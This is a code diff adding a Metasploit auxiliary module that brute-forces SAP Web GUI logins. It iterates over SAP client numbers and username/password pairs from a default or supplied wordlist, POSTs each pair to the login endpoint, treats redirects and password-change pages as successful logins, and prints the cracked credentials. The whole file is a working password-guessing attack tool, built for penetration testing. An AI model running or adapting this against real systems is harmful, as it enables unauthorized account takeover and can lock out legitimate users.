|
| 1 | +## |
| 2 | +# This file is part of the Metasploit Framework and may be subject to |
| 3 | +# redistribution and commercial restrictions. Please see the Metasploit |
| 4 | +# Framework web site for more information on licensing and terms of use. |
| 5 | +# http://metasploit.com/framework/ |
| 6 | +## |
| 7 | + |
| 8 | +## |
| 9 | +# This module is based on, inspired by, or is a port of a plugin available in |
| 10 | +# the Onapsis Bizploit Opensource ERP Penetration Testing framework - |
| 11 | +# http://www.onapsis.com/research-free-solutions.php. |
| 12 | +# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts |
| 13 | +# in producing the Metasploit modules and was happy to share his knowledge and |
| 14 | +# experience - a very cool guy. I'd also like to thank Chris John Riley, |
| 15 | +# Ian de Villiers and Joris van de Vis who have Beta tested the modules and |
| 16 | +# provided excellent feedback. Some people just seem to enjoy hacking SAP :) |
| 17 | +## |
| 18 | + |
| 19 | +require 'msf/core' |
| 20 | + |
| 21 | +class Metasploit4 < Msf::Auxiliary |
| 22 | + |
| 23 | + include Msf::Exploit::Remote::HttpClient |
| 24 | + include Msf::Auxiliary::Report |
| 25 | + include Msf::Auxiliary::Scanner |
| 26 | + include Msf::Auxiliary::AuthBrute |
| 27 | + |
| 28 | + def initialize |
| 29 | + super( |
| 30 | + 'Name' => 'SAP Web GUI Brute Force', |
| 31 | + 'Version' => '$Revision$', |
| 32 | + 'Description' => %q{ |
| 33 | + SAP Web GUI Brute Force. |
| 34 | + }, |
| 35 | + 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], |
| 36 | + 'Author' => [ 'nmonkee' ], |
| 37 | + 'License' => BSD_LICENSE |
| 38 | + ) |
| 39 | + register_options([ |
| 40 | + OptString.new('URI',[true, 'URI', "/"]), |
| 41 | + OptString.new('CLIENT', [false, 'Client can be single (066), comma seperated list (000,001,066) or range (000-999)', '000,001,066']), |
| 42 | + OptBool.new('DEFAULT_CRED',[false, 'Check using the default password and username',true]), |
| 43 | + OptString.new('USERPASS_FILE',[false, '',nil]), |
| 44 | + ], self.class) |
| 45 | + register_autofilter_ports([80]) |
| 46 | + end |
| 47 | + |
| 48 | + def run_host(ip) |
| 49 | + uri = datastore['URI'] |
| 50 | + if datastore['CLIENT'].nil? |
| 51 | + print_status("Using default SAP client list") |
| 52 | + client = ['000','001','066'] |
| 53 | + else |
| 54 | + client = [] |
| 55 | + if datastore['CLIENT'] =~ /^\d{3},/ |
| 56 | + client = datastore['CLIENT'].split(/,/) |
| 57 | + print_status("Brute forcing clients #{datastore['CLIENT']}") |
| 58 | + elsif datastore['CLIENT'] =~ /^\d{3}-\d{3}\z/ |
| 59 | + array = datastore['CLIENT'].split(/-/) |
| 60 | + client = (array.at(0)..array.at(1)).to_a |
| 61 | + print_status("Brute forcing clients #{datastore['CLIENT']}") |
| 62 | + elsif datastore['CLIENT'] =~ /^\d{3}\z/ |
| 63 | + client.push(datastore['CLIENT']) |
| 64 | + print_status("Brute forcing client #{datastore['CLIENT']}") |
| 65 | + else |
| 66 | + print_status("Invalid CLIENT - using default SAP client list instead") |
| 67 | + client = ['000','001','066'] |
| 68 | + end |
| 69 | + end |
| 70 | + saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, |
| 71 | + 'Header' => "[SAP] Credentials", |
| 72 | + 'Prefix' => "\n", |
| 73 | + 'Postfix' => "\n", |
| 74 | + 'Indent' => 1, |
| 75 | + 'Columns' => ["host","port","client","user","pass"]) |
| 76 | + if datastore['DEFAULT_CRED'] |
| 77 | + datastore['USERPASS_FILE'] = Msf::Config.data_directory + '/wordlists/sap_default.txt' |
| 78 | + end |
| 79 | + if datastore['USERPASS_FILE'] |
| 80 | + credentials = extract_word_pair(datastore['USERPASS_FILE']) |
| 81 | + credentials.each do |u,p| |
| 82 | + client.each do |cli| |
| 83 | + success = bruteforce(uri,u,p,cli) |
| 84 | + if success == true |
| 85 | + saptbl << [ip,rport,cli,u,p] |
| 86 | + end |
| 87 | + end |
| 88 | + end |
| 89 | + else |
| 90 | + #todo |
| 91 | + end |
| 92 | + print(saptbl.to_s) |
| 93 | + end |
| 94 | + |
| 95 | + def bruteforce(uri,user,pass,cli) |
| 96 | + begin |
| 97 | + path = "sap/bc/gui/sap/its/webgui/" |
| 98 | + cookie = "Active=true; sap-usercontext=sap-language=EN&sap-client=#{cli}" |
| 99 | + res = send_request_cgi({ |
| 100 | + 'uri' => "#{uri}#{path}", |
| 101 | + 'method' => 'POST', |
| 102 | + 'cookie' => cookie, |
| 103 | + 'vars_post' => { |
| 104 | + 'sap-system-login-oninputprocessing' => 'onLogin', |
| 105 | + 'sap-urlscheme' => '', |
| 106 | + 'sap-system-login' => 'onLogin', |
| 107 | + 'sap-system-login-basic_auth' => '', |
| 108 | + 'sap-system-login-cookie_disabled' => '', |
| 109 | + 'sysid' => '', |
| 110 | + 'sap-client' => cli, |
| 111 | + 'sap-user' => user, |
| 112 | + 'sap-password' => pass, |
| 113 | + 'sap-language' => 'EN', |
| 114 | + } |
| 115 | + }) |
| 116 | + rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT |
| 117 | + print_error("[SAP] #{ip}:#{rport} - Service failed to respond") |
| 118 | + return |
| 119 | + end |
| 120 | + |
| 121 | + if res and res.code == 302 |
| 122 | + return true |
| 123 | + end |
| 124 | + |
| 125 | + if res and res.code == 200 |
| 126 | + if res.body =~ /log on again/ |
| 127 | + return false |
| 128 | + elsif res.body =~ /<title>Change Password - SAP Web Application Server<\/title>/ |
| 129 | + return true |
| 130 | + elsif res.body =~ /Password logon no longer possible - too many failed attempts/ |
| 131 | + print_error("[SAP] #{ip}:#{rport} - #{user} locked in client #{cli}") |
| 132 | + return false |
| 133 | + end |
| 134 | + else |
| 135 | + print_error("[SAP] #{ip}:#{rport} - error trying #{user}/#{pass} against client #{cli}") |
| 136 | + end |
| 137 | + return |
| 138 | + end |
| 139 | +end |
0 commit comments